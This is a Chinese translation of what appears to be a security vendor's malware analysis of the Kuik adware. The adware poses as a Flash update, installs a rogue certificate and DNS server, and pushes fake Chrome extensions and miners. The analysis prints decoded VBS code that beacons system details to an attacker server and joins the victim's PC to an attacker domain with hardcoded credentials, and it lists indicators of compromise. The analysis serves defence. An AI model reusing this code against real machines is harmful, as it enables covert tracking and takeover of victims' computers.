写在前面的话

一些恶意软件可能编写很简单，但却可能带给用户巨大的痛苦，比如今天我们要讲的Kuik广告软件，情况就是这样。作者使用这种不寻常的技术将谷歌浏览器扩展程序和挖矿应用程序推送给受害者。在此博客中，我们将提供此广告软件的技术分析和自定义删除说明。‘’

技术说明

第1阶段 – .NET安装程序

0ba20fee958b88c48f3371ec8d8a8e5d

第一阶段是用.NET编写的，它会模仿Adobe Flash Player的图标(这是捆绑软件的典型特征)，并提示更新软件组件，但却将自己的代码添加到原始安装程序中。

用dotNet反编译器（即dnSpy）打开后，我们发现该项目的原始名称是 WWVaper。

它有三个内部资源：

• 证书（svr.crt）
• 一个合法的Flash（decoy）
• 下一阶段组件（upp.exe）

证书：

——- BEGIN CERTIFICATE ——-
MIIEZjCCA06gAwIBAgIJAPywkVD7m / 9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV
BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM
DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0
QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL
MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG
A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW
EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDMohZZUrsJOqXS1 / eTpGGOMDxEE + YmRLmSU5h / K4tmnkr7Tv9cukICp / Xxnrci
5ONLdqgQFH1xLxLa6Xo + 2X075NS0VjfMPx9WvYPSZ / T7uQQhb8Mc + ojjNoHK0JbD
oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55 + aWAdPSIDcdqxMt1uFOcF0DY4y
vHNpFw1xsjpYuvw1 / MvwITr3A + PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcH
qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX
N6erGBkM7VTfJ5yM9Pxfcu + hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU
3F / U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F / U3InMEiuduPEMMAkG
A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3
LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t
ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB
hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN
AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm
AC + 3h1huSyqxYGbJQ8J3wLOYRZH + N5GOZUvjwrU + NY5KurWbMj6USMfsWfnnSXQi
0ADyjYZqtPMmIaIK86yPx4t + 3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX
2g1YJAnjnq / 9Ilt3MOCEpoCnUz5E + bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0
2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx + F3mepR01UMaiwEBDGIeSWX

• joBVMKdqhFu9zChlN0dW0hbViIm + gDYsCQ =
  ——- END CERTIFICATE ——-

证书详情：

证书指向yahoo.com的DNS名称。但是，认证路径无效：

.NET安装程序负责安装恶意证书和其他组件。首先，它枚举网络接口并将收集的IP添加到列表中：

然后，它将新的IP作为DNS（18.219.162.248）添加到收集的接口。它还安装自己的证书（svr.crt）：

第2阶段 – upp.exe

3a13b73f823f081bcdc57ea8cc3140ac
此应用程序是一个未混淆的安装程序包。在里面，我们找到了一个cabinet文件：

它包含要删除的其他模块：

应用程序“install.exe”以“setup.bat”作为参数进行部署。

第3阶段 – 从cabinet中取出组件

应用程序install.exe是基本的。它的唯一作用是在elevated 模式下运行下一个进程。在下面，你可以看到它的主要功能：

脚本setup.bat部署了另一个名为SqadU9FBEV.bat的组件：

它通过ping 127.0.0.1来延迟执行。然后，它运行第二个编码脚本，为其提供一个活动ID作为参数：

下一个部署的元素是一个编码的VBS脚本：

在解码之后（用 这个解码器），我们看到了这个脚本：NYkjVVXepl.vbs。我们还看到它将系统和信标指纹到服务器：

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") 
for each System in SystemSet 
  winVer = System.Caption 
next
Function trackEvent(eventName, extraData)
  Set tracking = CreateObject("MSXML2.XMLHTTP")
  tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
  tracking.send
  err.clear
End Function

这个片段是将受感染的计算机添加到域：

SET objNetwork = CREATEOBJECT("WScript.Network")
strComputer = objNetwork.ComputerName
SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\" & strComputer & "rootcimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.comadministrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue  0) Or (err.number  0) Then
  trackEvent "join-domain-failed", ReturnValue
  WScript.Quit 1
Else
  trackEvent "join-domain-success", Null
  WScript.Quit 0
End IF

Payloads

这个程序使用了一系列的payloads，但是这个伪造的Chrome扩展似乎特别受欢迎。此外，还有一些挖矿程序正在服务：

删除

Malwarebytes 用户（版本3.x）可以通过运行全面扫描从系统中移除此威胁。删除包括取消加入恶意域控制器以将您的机器恢复到其原始状态。

妥协指标

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686 
990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome扩展程序

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx
d-and-h[.]com/123.crx
d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx
d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx
kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx
tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B751 
33D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB735968501268 
7889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD 
761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A 
871AD057247C023F68768724EBF23D00EF842F0B51​​0A3ACE544A8948AE775712